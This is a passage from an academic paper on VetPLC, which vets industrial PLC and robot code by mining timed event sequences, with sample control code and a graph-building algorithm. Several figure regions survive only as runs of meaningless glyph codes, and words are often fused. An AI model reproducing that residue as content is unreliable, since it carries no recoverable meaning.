syntax. Low-level code is assembly-like, and is developed through teach pendants which are handheld devices directly connected to robots. Aside from common program instructions (e.g., assignments, conditional or unconditional jumps and function calls), these programs all employ special motion instructions to guide physical movements and use wait instructions to enable delays and control timings. While Robot programs can be launched via a main function, in practice they are triggered dynamically by input events. The mapping between triggering signals and call targets is con gured using teach pendants. Without loss of generality, we hereafter ex- plain robot inner-workings based upon pick-and-place robots from FANUC that has the most industrial robots installedworldwide [56]. Speci cally, we focus on its teach pendant(TP) language, depicted in Figure 8, which is the de facto standard to program FANUC robots [1]. Cross-Device Communication. A PLC and a remote device communicate via signals using industrial network protocols, such as EtherNet/IP [8]. The remote device opens multiple pins for inputs and outputs. For example, a FANUC robot canenable 512 bits of digit inputs (DI) and 512 bits of digit outputs(DO). On the PLC side, each remote pin is mapped as a baseaddress (i.e., IP address) plus an offset. Thus, PLC code can control a remote device by directly accessing these mapped I/O bits. The I/O mappings are automatically con gured whena remote device is added to an ICS environment supervisedby a PLC. Once its IP address is determined, the underlying EtherNet/IP protocol takes the responsibility to recognize the I/Os on this device and bind them to PLC variables. III. P ROBLEM STATEMENT &A PPROACH OVERVIEW A. Motivating Example We motivate our problem using our SMART testbed [47], depicted in Figure 1. This testbed represents a fully functional assembly line that produces model cars. It consists of a gantry crane, a circular conveyor belt, 2 pick-and-place robots, 3 CNC (Computer Numerical Control) machines, and is controlled by a PLC. Particularly, it is equipped with Allen Bradley PLC from Rockwell Automation1and FANUC robots2. It is worth noting that the SMART testbed is a miniature of real-world automotive manufacturing sectors. It has been established and constantly upgraded for over 20 years, and has been used for numerous projects over the decades. This testbed 1Leading PLC supplier in North America w/ 60% of the market share [17] 2The most popular industrial robots worldwide [1] Fig. 1: SMART Testbed for Manufacturing Model Vehicles was developed by engineers from Rockwell Automation, fac- ulty and graduate students: the hardware components and theway they connect precisely resemble those on real-world fac- tory oors; a large body of controller code (e.g., robot motion, CNC operation, RFID I/O, etc.) was directly borrowed from industry practices [7]. The delity of this control system has been veri ed through consistent collaboration with Rockwell Automation. Physical Compositions. The gantry system serves as the entry and exit points of the testbed. It delivers empty palletsto CNC machine #1 to start the manufacturing processes and,eventually, it removes the produced parts from the conveyor. The circular conveyor belt is always on and keeps moving the pallets around the robots and CNCs. The robots and CNCmachines are organized into two cells to accomplish differenttasks (e.g., molding, ipping, etc.), where Cell 1 is comprisedof Robot #1 and CNC #1, and Cell 2 contains the rest. Immediately in front of each cell are RFID transceivers that can sense the presence of incoming pallets, empty or loaded, because RFID tags are attached to both pallets and parts. The RFID tag on a part maintains a numerical value indicating itsnext manufacturing process. A pallet stopper is also installed to every cell to block moving pallets. By default, the stopper is always enabled to block any arriving pallets unless a signalthat indicates otherwise is received. PLC and Robot Logics. Figure 2 and Figure 8 (in Ap- pendix A) show in part the control logic of the PLC and Robot #1 in Cell 1, respectively. The code snippets depicthow a processed part is passed from CNC to conveyor. Since a raw part has been delivered by the gantry to the CNC for processing, the PLC code (Figure 2) is now expecting to receive the processed part and deliver it to the next cellusing an empty pallet. The coordination between PLC androbot is realized through events. In order to receive and send these signals, 6 input variables (Ln.3-7,52), 2 output variables (Ln.8-9) and 4 internal variables (Ln.11-13,49) are declared.In each scan cycle, the PLC rst clears the output variablesduring initialization (Ln.16-19) and then checks all the inputvariables sequentially to update the outputs (Ln.21-44). More concretely, Ln.21-23 rst update the availability of an empty pallet at Cell 1 ( Pallet Arrival ) by checking the presence of a pallet ( Pallet Sensor ) and also the absence of a part ( NOT(Part Sensor) ). If, however, an incoming pallet is already loaded with a part (Ln.25-27), the PLC will send a signal via Retract Stopper to retract the stopper and let this pallet pass through. When an empty pallet has arrived at Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:19 UTC from IEEE Xplore. Restrictions apply. 1PROGRAM CELL1 2 VAR 3 Pallet_Sensor AT %IX0.1 : BOOL; 4 Part_Sensor AT %IX0.2 : BOOL; 5 CNC_Part_Ready AT %IX0.3 : BOOL; 6 Robot_Ready AT %IX0.4 : BOOL; //DO[6] 7 Part_AtConveyor AT %IX0.5 : BOOL; //DO[2] 8 Retract_Stopper AT %QX0.1: BOOL; 9 Deliver_Part AT %QX0.2 : BOOL; //DI[0] 10 11 Pallet_Arrival AT %MX0.1 : BOOL; 12 Update_Part_Process AT %MX0.2 : BOOL; 13 Update_Complete AT %MX0.3 : BOOL; 14 END_VAR 15 16 Pallet_Arrival := false ; 17 Retract_Stopper := false ; 18 Deliver_Part := false ; 19 Update_Part_Process := false ; 20 21 IF Pallet_Sensor AND NOT(Part_Sensor) THEN 22 Pallet_Arrival := true ; 23 END_IF; 24 25 IF Part_Sensor THEN 26 Retract_Stopper := true ; 27 END_IF; 28 29 IF Pallet_Arrival AND CNC_Part_Ready AND Robot_Ready AND NOT(Part_AtConveyor) THEN 30 Deliver_Part := true ; 31 Update_Part_Process := true ; 32 CNC_Part_Ready := false ; 33 Robot_Ready := false ; 34 END_IF; 35 36 IF Update_Part_Process THEN 37 //Call subroutine to update process No. 38 UPDATE_PART(2); 39 END_IF; 40 41 IF Update_Complete AND Part_AtConveyor THEN 42 Retract_Stopper := true ; 43 Update_Complete := false ; 44 END_IF; 45END_PROGRAM 46 47PROGRAM UPDATE_PART 48 VAR_INPUT 49 Part_Process AT %MD50 : DWORD; 50 END_VAR 51 VAR 52 RFID_IO_Complete AT %IX0.6 : BOOL; 53 Update_Complete AT %MX0.3 : BOOL; 54 END_VAR 55 //Perform 15-step I/O operations on RFID 56 ... 57 IF RFID_IO_Complete THEN 58 Update_Complete := true ; 59 END_IF 60END_PROGRAM Fig. 2: PLC ST Code for Picking Up Processed Parts Cell 1, the PLC code (Ln.29-34) will further check the Boolean inputs, CNC Part Ready ,Robot Ready andNOT(Part - AtConveyor) , to con rm the existence of a processed part, availability of robot and clearance of parts on the conveyor,respectively. If all the conditions are satis ed, the PLC will then perform two actions: 1) requesting the robot to pass the processed part to pallet and 2) updating the manufacturing process number on the part. Two signals Deliver Part and Update Part Process are thus enabled. 1)Deliver Part . Based upon con guration, the variable Deliver Part is mapped to a digital input ( DI[0] )o nt h e robot side. Being true, this signal triggers the robot program in Figure 8 to execute. The robot code then operates therobot arm, via a series of motion instructions such as linear movement L or joint movement J , in order to pick up a part from the CNC machine (Figure 8 Ln.6-12) and passit to the conveyor (Figure 8 Ln.18-20). When the part has beendelivered to the conveyor, the robot turns on its output signal DO[2] for 0.5 seconds to indicate the completion (Figure 8 Ln.22-24). This output is then mapped to Part AtConveyor on the PLC. In the end, the robot returns to a safe zone. 2)Update Part Process . When this variable is true, a subroutine UPDATE PART(int) is called to conduct a 15- step I/O operation on the RFID attached to the part (Ln.36- 39). When this is done, the subroutine (Ln.47-60) will receive aRFID IOComplete signal and then notify its caller by setting the Boolean variable Update Complete . To check whether the two actions are completed, PLC constantly reads two response signals Part AtConveyor and Update Complete . When both signals are true, PLC will retract the stopper to transfer this loaded pallet (Ln.41-44). Safety Violation and Root Cause. This code, in fact, can lead to item over ow [9], which is a typical type ofsafety issues on the factory oor. Fundamentally, it is causedby mismatched expectations between the sender (robot) and receiver (PLC) of event Part AtConveyor s duration. The signal Part AtConveyor has dual purposes. When it is true, it indicates the robot has delivered a part to the pallet, which can now leave the cell. When it is off, that means the conveyor has been cleared to accept a new part, and the robot can then move away from conveyor for anotherdelivery. However, in practice, the robot does not need to stop at conveyor waiting for the pallet to leave. Although the robot cannot pass the second part to the conveyor prior to thedeparture of rst one, the robot can, in fact, move towards theCNC in advance to save time for the next delivery. For the sake of saving time, the developers implemented a timeout in the robot code and only allowed the event Part AtConveyor (DO[2] ) to last for 0.5 seconds (Figure 8 Ln.23-24), no matter if the conveyor is cleared by then. As a result, the robot is guaranteed to start handling another delivery 0.5 seconds after the previous one. Unfortunately, if the robot turns off Part AtConveyor prematurely, the PLC may never see both Part AtConveyor andUpdate Complete being set to true at the same time, either due to an unexpectedly fast part delivery or slow RFIDupdate. This is also because PLC developers typically do notbuffer old signal values (in this case, Part AtConveyor being TRUE ) but rather always read data directly from theirorigins, in order to avoid synchronization problem. In fact, a real-world error has been reported from the SMART testbed when the speed of robot is increased to a certain extent, and thus Part AtConveyor ends even before the update of process number is complete. Then,there exists no window when both Update Complete and Part AtConveyor are true (Figure 3b). In that case, even if the pallet has already been loaded, it can never leave the cell. This error can cause a serious safety issue since the con- veyor will over ow due to the constantly arriving pallets. Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:19 UTC from IEEE Xplore. Restrictions apply. /g25/g20/g5/g14/g9/g14/g17/g21/g5/g11/g8/g10/g19 /g24/g20/g6/g8/g16/g17/g21/g1/g17/g2/g14/g13/g18/g10/g19/g14/g16/g7/g6/g8/g16/g17/g21/g1/g17/g2/g14/g13/g18/g10/g19/g14/g16/g4/g5/g3 /g23/g20/g7/g15/g9/g8/g17/g10/g21/g2/g14/g12/g15/g11/g10/g17/g10 /g24/g20/g2/g3/g2/g21/g4/g8/g15/g17/g21/g5/g11/g8/g10/g19 /g22/g20/g4/g8/g12/g12/g11/g17/g21/g6/g11/g13/g16/g14/g15 /g2/barb2right/g3/barb2right/g4/barb2right/g5/barb2right/g6/barb2right/g7/barb2right/g8/g1 /g9/g12/g13/g13/g11/g10/g14/g23/g20/g1/g4/g8/g15/g17/g21/g6/g11/g13/g16/g14/g15 /g26/g20/g1/g4/g8/g15/g17/g21/g1/g17/g2/g14/g13/g18/g11/g19/g14/g15/g2/g1/g3/g4 (a) Sequence 1/g24/g20/g6/g8/g16/g17/g21/g1/g17/g2/g14/g13/g18/g10/g19/g14/g16 /g1/g6/g8/g16/g17/g21/g1/g17/g2/g14/g13/g18/g10/g19/g14/g16/g4/g5/g3 /g23/g20/g7/g15/g9/g8/g17/g10/g21/g2/g14/g12/g15/g11/g10/g17/g10 /g2/g4/g3/barb2right/g6/barb2right/barb2right/g5/g1/g7/g9/g9/g8/g9 /g1/g3/g2/g4/g10 (b) Sequence 2/g24/g20/g6/g8/g16/g17/g21/g1/g17/g2/g14/g13/g18/g10/g19/g14/g16 /g1 /g6/g8/g16/g17/g21/g1/g17/g2/g14/g13/g18/g10/g19/g14/g16/g4/g5/g3 /g23/g20/g7/g15/g9/g8/g17/g10/g21/g2/g14/g12/g15/g11/g10/g17/g10 /g2/g4/g3/barb2right/g6/barb2right/barb2right/g5/g1/g7/g10/g11/g11/g9/g8/g13/g1/g3/g2/g4/g12 (c) Sequence 3 Fig. 3: Event Sequences with Different Orders and Timings Eventually, it will cause pallets to collide and fall, or even cause the overloaded conveyor to break. Though seemingly straightforward, this is in fact a typical safety violation that can cause severe injuries on the factory oor and thus has attracted attention in both industrial practices [5], [6], [9] and academic research [37]. It is worth noting that although we highlight this issue using collaborative PLC and a robot, it is actually a common problem that can be caused by coordination of any types of controllers, such as multiple PLCs, PLCs and CNCs (con- trolled by an integrated slave PLC) or CNCs and robots. Both our experience and domain knowledge from eld engineers (from Rockwell) show that a large portion of PLC safetyproblems originated from the coordination required betweenmultiple units because they are manufactured by differentvendors and programmed individually without considering different contexts (e.g., timing). Nevertheless, we believe the problem involving PLCs and robots is the most challenging one to address because it requires the understanding of multi- ple programming languages and their interactions. Hence, we focus on such a case to explain our approach. However, aswe show in the evaluation, our system can be applied to otherclasses of coordinating systems as well. Challenge for Detecting the Problem. Static analyses may cause signi cant false positives due to the lack of runtime constraints and thus cannot easily address this problem. For instance, a potential error state detected by static analysis may only be triggered when the speed of robot is greater than 10m/sec, which however can never be reached in practice. In contrast, dynamic analysis and symbolic execution do not cause false positives. To use them on event-driven pro-grams, prior work [27], [46], [51], [55], [66], [67] gener-ated event sequences of different orders to exercise codeand explore paths. In our case, one can create an eventsequence following the order of 1:Pallet Sensor /squiggleright2: Part Sensor /squiggleright3:CNC Part Ready/squiggleright4:Robot Ready /squiggleright5: Part AtConveyor /squiggleright6:Update Complete /squiggleright 7:Part AtConveyor , as illustrated in Figure 3a. Note that eventually Part AtConveyor terminates due to the robot logic. Exercising PLC code using such this sequence doesnot lead to any error. One can then permute the events by switching 6:Update Complete and7:Part AtConveyor (Figure 3b). Then, the safety problem will occur at runtime. However, just rearranging the event order may not solve the path discovery problem in time-constrained controller programs. For instance, the event sequence in Figure 3c sharesthe same ordering as the one in Figure 3b, yet it cannot cause /g5/g14/g21/g14/g25/g11/g27/g18/g21/g16/g1/g4/g29/g14/g21/g27/g1/g3/g11/g28/g26/g11/g19/g18/g27/g31/g1/g5/g25/g11/g23/g17 /g35/g26/g33/g20/g33/g26/g34/g26 /g2/g28/g27/g22/g20/g11/g27/g14/g13/g1/g8/g11/g15/g14/g27/g31/g1/g10/g14/g27/g27/g18/g21/g16 /g30/g32/g1/g9/g18/g20/g14/g13/g1/g4/g29/g14/g21/g27/g1/g8/g14/g24/g28/g14/g21/g12/g14/g26 /g14 /g27 /g27 /g18 /g21 /g16 /g7/g18/g21/g18/g21/g16/g1/g9/g14/g20/g23/g22/g25/g11/g19/g1/g6/g21/g29/g11/g25/g18/g11/g21/g27/g26 Fig. 4: Overview of V ETPLC System the error. When the time difference between events 7and6 changes, the consequence may also vary. To address this problem, we expect to automatically produce effective, error-triggering event sequences (such as Figure 3b) by considering both ordering and timing of events. Noticethat an alternative approach is to model internal timeouts as external events and then perform event permutation withoutconsidering timing. For example, the termination of event Part AtConveyor can then become another independent event, and the permutation thus is conducted over 8 events.However, we would argue that this solution has two majorshortcomings: 1) it may drastically increase the event space; and 2) the generated sequences can cause false alarms because they may still violate critical time and physical constraints andthus are actually invalid. Its fundamental limitation lies in thefact it assumes the complete independence of individual eventsand does not quantitatively consider their temporal contexts. B. Threat Model We consider that adversaries can trigger vulnerabilities in benign (but faulty) PLC code via manipulation of con gurationoptions that impact important physical properties such as machine speeds. In addition, we also consider that insiders can compromise PLC source code to intentionally inject (stealthy) safety violations (e.g., PLC logic bombs [41]). Note that insider attacks are top security challenges [40], [64] for air- gapped ICS and have been identi ed in major ICS incidents in- cluding Stuxnet and the Maroochy Water Services Attack [23].As a result, PLC source code and con gurations may not betrustworthy. Note though, we assume that the rest of the ICSenvironment, including hardware and operating systems, aswell as our data collection mechanisms are trusted. It is worth mentioning that, at this point, our work is mainly focusing on the detection of safety violations. However, some of the techniques we developed can also be useful to addresssecurity challenges in the ICS context. C. System Overview To achieve our goal, we have developed V ETPLC, that consists of 3 major steps. Figure 4 illustrates its architecture.We hope to deploy V ETPLC as a vetting tool to examine any PLC code before it is released for a production system. (1)Generating Event Causality Graph. Given the PLC and robot code, we rst perform static program analysesto extract the event causality graphs for interconnected devices. We further leverage speci ed I/O mapping to handle cross-device communication. (2)Mining Temporal Invariants. Next, to understand those quantitative temporal relations that cannot be revealed by Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:19 UTC from IEEE Xplore. Restrictions apply. program code, we collect runtime data traces of PLC variables from physical ICS testbeds. We then examinethe traces to infer the occurrences of particular events and conduct data mining to discover temporal event invariants. (3)Automated Safety Vetting with Timed Event Se- quences. Constrained by the generated timed event causal- ity graphs, we perform event permutations to automati-cally create timed event sequences. Then, we apply thegenerated sequences to exercise PLC code for dynamicanalysis. To automatically identify safety problems, weformalize and craft safety speci cations according to ex-pert knowledge so as to perform runtime veri cation. IV . T IMED EVENT CAUSALITY GRAPH A. Key Factors An a ve approach to deriving event sequences is to consider every combination of events. For instance, prior work has presented a baseline approach, A LLSEQS [27], that exhaus- tively permutes all UI events to create triggering sequences for testing Android apps. However, due to the massive pos- sible permutations, such a solution can be prohibitively timeconsuming. In fact, not all permutations are valid sequencesbecause the causal dependencies of PLC events are inherentlyconstrained by controller code. To reduce the search space, we can extract such dependencies from program logics in the rst place. Particularly, we are interested in three causal factors. Control-Flow. We take into account intra-procedural, inter-procedural and cross-device control ow dependen-cies: 1) within a function, event variables evaluated in anIF-Condition have direct causal impact on those de ned in its IF-Clause; 2) for function calls, we consider that the callsite in the caller causes all the logic in the callee; 3) cross-device event exchanges via mapped I/O indicate the causal relations between code on multiple controllers. Constants. The constant value of an event-related vari- able in an IF-Condition can partially determine if the IF-Clause becomes effective. Thus, the data ow from the constant assignment to the condition check of this variable indicates that the former causes the latter. Event Duration. The causal effect of events may last for a certain amount of time when subsequent states aremaintained. Machines with local memory can produceevents with permanent states. The PLC can also help pre-serve the states of transient signals (i.e., sensor readings)or its internal events. In the meantime, event senders canalso proactively terminate signals based upon timing. In addition to these internal factors, the occurrences of events are also affected by external timing constraints caused by physical actions, such as robot motion and external I/O operations. We will discuss this in Section V . B. F ormal De nition To interpret the internal constraints on event ordering, we extract the causal and temporal relations among events from PLC and robot code to generate dependency graphs. In particular, we describe the cross-device event dependencies/g4/g17/g19/g18/g27/g17/g24/g31/g9/g13/g24/g26 /g6/g17/g5/g9/g8/g15 /g1/g18/g6/g19/g1/g5/g11/g7/g11/g12/g1/g6/g10/g8/g9/g4/g3/g2/g1/g6/g10/g8/g9 /g9/g13/g19/g19/g17/g26/g31/g11/g17/g21/g25/g22/g24 /g6/g17/g2/g4/g15/g1/g18/g6/g19/g1/g9/g13/g24/g26/g31/g11/g17/g21/g25/g22/g24 /g6/g17/g2/g4/g15/g1/g18/g6/g19 /g3/g7/g3/g31/g9/g13/g24/g26/g31/g10/g17/g13/g16/g28 /g6/g17/g2/g4/g15/g1/g18/g6/g19 /g10/g22/g14/g22/g26/g31/g10/g17/g13/g16/g28 /g6/g17/g2/g4/g15/g1/g18/g6/g19 /g1/g9/g13/g24/g26/g31/g2/g26/g3/g22/g21/g27/g17/g28/g22/g24 /g6/g17/g2/g4/g15/g1/g18/g6/g19/g9/g13/g19/g19/g17/g26/g31/g2/g24/g24/g18/g27/g13/g19 /g6/g17/g3/g13/g11/g10 /g12/g15/g1/g18/g6/g19 /g12/g23/g16/g13/g26/g17/g31/g9/g13/g24/g26/g31/g9/g24/g22/g15/g17/g25/g25 /g6/g17/g3/g13/g11/g10 /g12/g15/g1/g18/g6/g19 /g9/g13/g24/g26/g31/g2/g26/g3/g22/g21/g27/g17/g28/g22/g24 /g6/g17/g2/g4/g15/g1/g18/g20/g16/g21/g14/g19/g4/g6/g32/g34/g33 /g7/g17/g2/g4/g15/g1/g18/g6/g19 /g4/g8/g32/g36/g33 /g7/g17/g5/g9/g8/g15/g1/g18/g20/g16/g21/g14/g19/g10/g5/g6/g4/g31/g6/g8/g31/g3/g22/g20/g23/g19/g17/g26/g17 /g6/g17/g2/g4/g15/g1/g18/g6/g19 /g12/g23/g16/g13/g26/g17/g31/g3/g22/g20/g23/g19/g17/g26/g17 /g6/g17/g3/g13/g11/g10 /g12/g15/g1/g18/g6/g19/g32/g35/g39/g25/g29 /g1/g36/g34/g25/g33/g32/g37/g25/g29/g1/g37/g40/g30/g38/g25/g33 Fig. 5: The TECG of the Motivating Example using Timed Event Causality Graphs (TECG s). At a high level, a TECG is based upon the And-Or Graph [53] that can illustrate the causalities among events and express their and/orrelationships. A formal de nition is presented as follows. De nition 1. ATimed Event Causality Graph is a directed graph G=(V,E, , ) over a set of events and a set of time durations T, where: The set of vertices Vcorresponds to the events in ; The set of edges E V Vcorresponds to the causal dependencies between events, where the combination of all immediate predecessors of a vertex can always cause thissuccessor event to happen. Speci cally, if some of thesepredecessor vertices form a conjunction, their outgoing edges become compounded using an arch ; if they form a disjunc- tion, the corresponding edges are separated. The labeling function :V associates nodes with the labels of corresponding events, where each label is comprised of 3 elements: event name, class and duration. An event is named after the atomic proposition it affects. For instance, if an event causes a==15 to be true, we name it as a==15 ; if it causes Boolean cto be false, we refer to it as c . We consider 6 classes of events, including input (P IN), output (P OUT), local (P Local) events of PLC and those of a remote device (R IN, R OUT, R Local). The event duration is either Permanent (P), meaning it is always enabled until turned off by PLC logic, or a nite amount of time. The labeling function :E Tassociates edges with the labels of time intervals. These labels are concrete numbers if we can retrieve the corresponding time intervals from ICStestbeds; otherwise, they are Indeterminate . C.TECG of Motivating Example Figure 5 depicts the TECG of the motivating example. At rst, this automation system expects to receive events from two sensors. The conjunction of a positive event, Pallet - Sensor , and a negative one, Part Sensor , triggers the PLC local event Pallet Arrival . Then, if all of the 4 events, Pallet Arrival ,CNC Part Ready ,Robot - Ready and Part AtConveyor are received, the PLC will signal the robot via an output event Deliver Part . Hence, the conjunction of these four events leads to the generation of Deliver Part , and such a causal dependency is represented by the compounded edges from the former to the latter. Further, Deliver Part is mapped to the robot event Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:19 UTC from IEEE Xplore. Restrictions apply. DI[0] , which causes the robot arm to function. Once its oper- ation is completed, the robot turns on the output DO[2] and in effect sends the event Part AtConveyor back to the PLC. Thus, these events are connected due to cross-device controldependencies. Since DO[2] (Part AtConveyor ) terminates in 0.5 seconds according to the robot code, its duration is 0.5s instead of Permanent . In the meantime, when the conjunction of aforementioned 4 events is satis ed, another PLC local event Update Part - Process will occur. This event causes a subroutine call, in which PLC starts to update the process number encoded in theRFID on the part. Once the update is done, the RFID replies to the PLC with RFID IOComplete , which in turn triggers Update Complete that the main routine expects. By default, the time intervals of all edges are Indeter- minate , and thus are not shown on this graph. We laterperform data mining on traces collected from ICS testbeds to extract temporal invariants associated with certain edges, such as Update Part Process[3s,39.4s] RFID IOComplete . D. Graph Construction To generate TECG s, we perform static analyses that are tailored for the unique programming paradigms of PLC code. a) Special Consideration for PLC Scan Cycles: Prior work has paid special attentions to PLC s dedicated data types,such as Timers and Counters [54], and its preemptive thread scheduling model [43]. In addition, we believe that it is also crucial to take into account PLC s scan cycles that cause implicit, yet signi cant impact, to entry points and data owof PLC code. Nevertheless, to the best of our knowledge, this has never been seriously explored in prior work. Entry Point Discovery. PLC code is event-driven and thus all its event handlers are program entry points. In contrast totypical event-driven programs that use dedicated constructs toexplicitly implement event handling mechanisms, event han-dlers in PLC code are implicitly de ned using IF-Conditions.Because internal value changes in one scan cycle do notbecome effective until the next one begins, the IF-Conditions in PLC code can only be affected by external inputs received at the beginning of a cycle. Therefore, in effect, they act as eventhandlers to capture either new sensor readings or updates fromlast cycle. Hence, an IF-Condition becomes the entry point ofits IF-Clause code as well as the subroutines called by the IF- Clause. For IF-Clause code wrapped by nested IF-Conditions, we consider the inner-most one to be its entry point. Data ow Analysis. The fact that variables are of xed value in every cycle also causes the data ow to change. As explained in Section II, the process of data ow analysis for PLC code is mainly to track data dependencies between scancycles. Further, due to the existence of asynchronous eventhandlers, the analysis should compute data reachability fromany de ne in one cycle to any use in the next. b) Graph Construction Algorithm: Our algorithm for generating timed event causality graphs is illustrated in Algo-rithm 1. This algorithm expects to receive three inputs, PLC, REMOTE andIOMapping . They represent PLC code, a set ofremote controller code (e.g., robot code) and the I/O mappings between PLC and remote devices, respectively. Its output isa timed event causality graph, TECG , which is comprised of a set of edges. The I/O mappings are automatically establishedwhen remote devices are added to the PLC and thus can beretrieved from PLC con gurations. During initialization, we set TECG to be an empty set. Next, we transform all predicates in the IF-Conditions ofPLC code into disjunctive normal form (DNF) in order to illustrate them using an And-Or graph. Thus, an original predicate becomes a set of sub-predicates connected via OR logic, while each sub-predicate is a conjunction of events depicted as compounded edges. Further, we retrieve all the entry points (i.e., IF-Conditions) EPof PLC code. Meanwhile, we also link neighbors of nested IF-Conditions to show their control relations. Then, we iterate over every event (i.e., atomic proposition) pin inEPand seek its root causes, which are events or event combinations that can always lead to pin. We rst aim to discover the root causes for pinwithin the PLC code. To this end, we perform use-def chain analysisto obtain the de nition set DEF ofpin and then look for the entry point EP (again, IF-Conditions) of each de nition def inDEF . The events in EP thus have causal impact on def and onpin. To ensure the positive causal dependency betweenEP andpin, we also conduct constant analysis for def.I fdef is a constant and its value can satisfy pin,w e can then determine that EP can cause pinto happen. Hence, we call TECG .ADDCOMPOUND EDGES () to link EP withpin and handle the construction of compounded edges. It is worth noting that since IF-Conditions in one scan cycle can be affected by any code in the previous one (data ow- wise), our use-def chain and constant analyses will look for de nitions from everywhere in PLC code. Ideally, we can con- sider an in nite chain of scan cycles and compute backwarddata ow exhaustively in an iterative fashion. However, suchcomputation is excessively expensive. Besides, the generateddependencies can be extremely complex (e.g., conditionaldependencies) and therefore may not be easily applied to eventsequence generation. Thus, in practice, we take a conservative approach and only look back for one previous cycle. As a result, our analysis may miss some dependencies in speci c conditions. Nevertheless, while missing a dependency maylead to invalid permutations of events, it does not result in theexclusion of valid event sequences. Moreover, our evaluation shows that, although conservative, our analysis can already help remove a large number of invalid sequences. Besides searching for intra-PLC causalities, we also seek possible root causes of pinacross devices. Our cross-device analysis starts from Ln.13. It is performed on an on-demand basis and only begins when pin is mapped to an output of a remote device. If pin indeed exists in the IOMapping , we retrieve its mapped counterpart rout and add an edge (rout,pin )into TECG . Then, we search for the entry point REP forrout in the code of remote controller (e.g., robot, CNC, PLC). The entry point REP represents the trigger of rout . If any input rininREP can be mapped to a PLC output Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:19 UTC from IEEE Xplore. Restrictions apply. Algorithm 1 Construction of Timed Event Causality Graph 1:procedure BUILD TECG( PLC,REMOTE ,IOMapping ) 2: TECG 3: T RANSFROM PREDICATES TODNF (PLC) 4:EP GETANDLINKENTRY POINTS (PLC) 5: for pin EPdo 6: DEF USEDEFCHAIN (PLC,pin ) 7: for def DEF do 8: ifISCONST (def) ISSATISFIED (pin,def )then 9: EP GETENTRY POINT (PLC,def ) 10: TECG.ADDCOMPOUND EDGES (EP,pin ) 11: end if 12: end for 13: ifIOMapping .EXISTS (pin)then 14: rout IOMapping .GET(pin) 15: TECG TECG (rout,pin ) 16: REP GETENTRY POINT (REMOTE ,rout ) 17: for rin REP do 18: ifIOMapping .EXISTS (rin)then 19: pout IOMapping .GET(rin) 20: TECG TECG (pout,rin ) 21: EP GETENTRY POINT (PLC,pout ) 22: TECG.ADDCOMPOUND EDGES (EP,pout ) 23: end if 24: end for 25: end if 26: end for 27: A DDEVENT CLASS ANDDURATION (TECG,PLC,REMOTE ) 28: return TECG 29: end procedure pout , the edge (pout,rin )will be added to TECG as well. We then trace back from pout to nd its entry point EP in PLC code, and add compounded edges from EP topout . The last step for graph construction is to annotate vertices with event classes and durations. Event classes can be explic- itly obtained from the variable declarations in PLC/CNC code or robot speci cations. The durations of all events by defaultare set to be Permanent (P). Only if we can infer the concretetime duration of an event, will we safely update its label. Tothis end, for each input event (i.e., atomic proposition), we rst discover the constant de nitions that cause the proposition to be true. Then, we discover all the negative rede nitions that lead the proposition to be false. Next, we perform intra- procedural reachability analysis from the de nitions to those rede nitions. If a reachable path is discovered, we further examine every statement along the path to see if any time-related instructions (i.e., wait) are present. If so, we extract and accumulate their constant parameters as the duration of this event. We do not handle variable parameters in this work. The implementation is further explained in Appendix B. V. D ISCOVERY OF TEMPORAL CONTEXT A. Data Collection Collecting Data Instead of Events. Ideally, we hope to directly collect event traces from ICS testbeds to identify their temporal behavior. However, this requires instrumentation of various distributed data sources, including sensors, robot I/O modules, RFID, etc. and therefore is an extremely dif cult and tedious task. On the contrary, the data trace of PLC variables is easier to obtain due to standardized communication protocols. Yet it only preserves the runtime states of these variables but does not record the events that cause the states to transition.To bridge this gap, we intend to infer the presence of events based upon value changes in data traces and thus manage toapproximate the collection of discrete physical events with the retrieval of continuous data traces. Interesting Properties. We are interested in three properties of PLC variables: name, value and timestamp. Variable name serves as the unique identi er of a variable; the instant valueof a variable re ects its current state and can be affected by speci c events; the timestamp is the system time when thevariable is being observed. Thus, we can de ne a data item d in our observation as a triple: d=(var name,value,time ). Querying Realtime Data in Recurring Operations. We collect both positive and negative data traces from running testbeds. A positive instance begins with the arrival of empty pallet and ends in the successful departure of a loaded pallet, and thus contains all the interesting stages such as robot delivery and RFID update. A negative instance does not lead to the successful stage due to multiple reasons, such as arriving pallet loaded with part, robot not ready, CNC not ready, etc.For every instance, we keep logging all the variable values overtime in order to retrieve runtime data traces. Formally, a datatraceDT is a list of data item d:DT={d 0,d1,...,d n}.I n practice, we run Cell-1 logic 20 times and collect 10 positiveand 10 negative instances, each of which takes approximately25 minutes. Thus, our dataset consists of a set of data traces and we refer to it as: DT={DT 0,DT 1,...,DT m}, where m=1 9 . We obtained 1.2 GB data in 10 hours from our testbed that runs logic code containing 35 variables. It is noteworthy that, although limited, our dataset in practice can already help reveal the necessary invariants for detecting real-world safety problems. One possible solution to increase the amount and diversity of data traces is to follow a state-of-the-art technique (i.e., code mutation [33]) and automatically produce a large quantity of positive and negative data traces to cover a majority of normal and abnormal cases. We leave the systematic trace construction as future work. B. Mining Temporal Properties Inferring Discrete Events from Data Traces. For each data trace DT iin our dataset DT, we need to rst infer the existence of events. To this end, we rst divide everyDT iinto multiple sublists {DTv0 i,DTv1 i,...,DTvk i}where items in an individual list share the same variable name. We then iterate over each sublist. If we discover a difference between values of two neighboring items d/prime landd/prime l+1,w e record a new event e=(type,time ), where the type is denoted using the new state of this variable and the time is the timestamp of d/prime l+1. For instance, if the value of variable Deliver Part rises from 0 to 1 at time 33, then we identify an event ( Deliver Part , 33); if Part AtConveyor s value drops from 1 to 0 at time 60, then we nd an event ( Part AtConveyor , 60). Eventually, we merge discovered events from all sublists and thus convert a data trace DT iinto an event trace ETi={e0,e1,...,e p}. We therefore obtain a dataset of event traces ET={ET 0,ET 1,...,ET 19}. The formal algorithm is presented as Algorithm 3 in Appendix C. Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:19 UTC from IEEE Xplore. Restrictions apply. TABLE I: Mined Invariants Event Pair Invariant /square(Deliver Part Part AtConveyor ) [24.4s, 24.6s] /square(Update Part Process RFID IOComplete )[15s, 20s] /square(Update Part Process Update Complete ) [15s, 20s] Temporal Invariants for Events. Once we have generated event traces, we would like to uncover constant time intervals between events of different types. Such constants can re ect the operation time of speci c machines. However, in 